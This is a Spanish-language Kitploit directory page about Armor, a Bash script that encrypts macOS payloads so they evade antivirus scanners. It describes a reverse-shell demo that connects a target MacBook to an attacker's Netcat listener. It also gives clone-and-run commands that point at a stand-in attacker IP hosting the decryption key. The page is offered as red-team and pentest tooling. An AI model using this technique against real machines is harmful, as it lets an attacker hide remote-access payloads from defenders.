Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Armor — Armor es un script Bash simple diseñado para crear payloads de macOS cifrados capaces de evadir escáneres antivirus. | Kitploit
Herramientas/GitHubGitHub/tokyoneon/armor
Herramientas de Cifrado/DescifradoGeneración de PayloadsShellcodePruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubtokyoneon/armor

Armor

Armor es un script Bash simple diseñado para crear payloads de macOS cifrados capaces de evadir escáneres antivirus.

Ver Repositorio
27756hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Armor

Armor es un script Bash simple diseñado para crear payloads cifrados de macOS capaces de evadir escáneres antivirus. A continuación, se muestra un ejemplo en gif de Armor siendo utilizado con un payload Netcat simple.

Armor

Se inicia un listener Netcat en el puerto 4444. El archivo "payload.txt" se lee y se muestra que contiene un simple one-liner de Bash que, al ejecutarse, creará una conexión TCP entre la MacBook objetivo y el listener Netcat del atacante. Armor se utiliza para cifrar el one-liner de Bash. Ncat se utiliza para alojar la clave de descifrado en el servidor del atacante. Cuando el stager se ejecuta en la MacBook objetivo (no se muestra en el gif), el one-liner de Bash se descifra y se ejecuta sin escribir ningún dato en el disco duro. Ncat termina inmediatamente el listener después de que la clave haya sido utilizada. Cuando se establece la conexión Netcat, el atacante tiene acceso remoto a la MacBook objetivo.

Es cierto que cifrar la mayoría de los payloads específicos de macOS es excesivo. Este one-liner de Bash en particular es capaz de evadir el antivirus sin la ayuda de Armor. Pero esto es solo un ejemplo. El mismo grado de ofuscación se puede aplicar a scripts sofisticados de Python, Ruby y Shell diseñados para ejecutar una variedad de ataques avanzados.

Instalación

Armor depende de LibreSSL para cifrar el archivo de entrada y crear el certificado SSL. Si LibreSSL no se encuentra en su sistema, Armor intentará instalarlo. La función para esto se puede encontrar en el archivo armor.sh. Ncat también es una dependencia y se puede instalar en Kali usando $ apt-get update && apt-get install nmap.

Armor se puede clonar y ejecutar usando los siguientes comandos.

root@kitploit:~
git clone https://github.com/tokyoneon/Armor
cd Armor/
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

La dirección 1.2.3.4 es la dirección IP del atacante donde se alojará la clave de descifrado. Puede ser una dirección IP local o VPS. El número de puerto (443) es arbitrario y se puede cambiar según sea necesario.

Preguntas e inquietudes:

  • Twitter: @tokyoneon_
  • WonderHowTo: https://creator.wonderhowto.com/tokyoneon/
  • Correo electrónico: dG9reW9uZW9uQHBtLm1lCg==
Descargar herramienta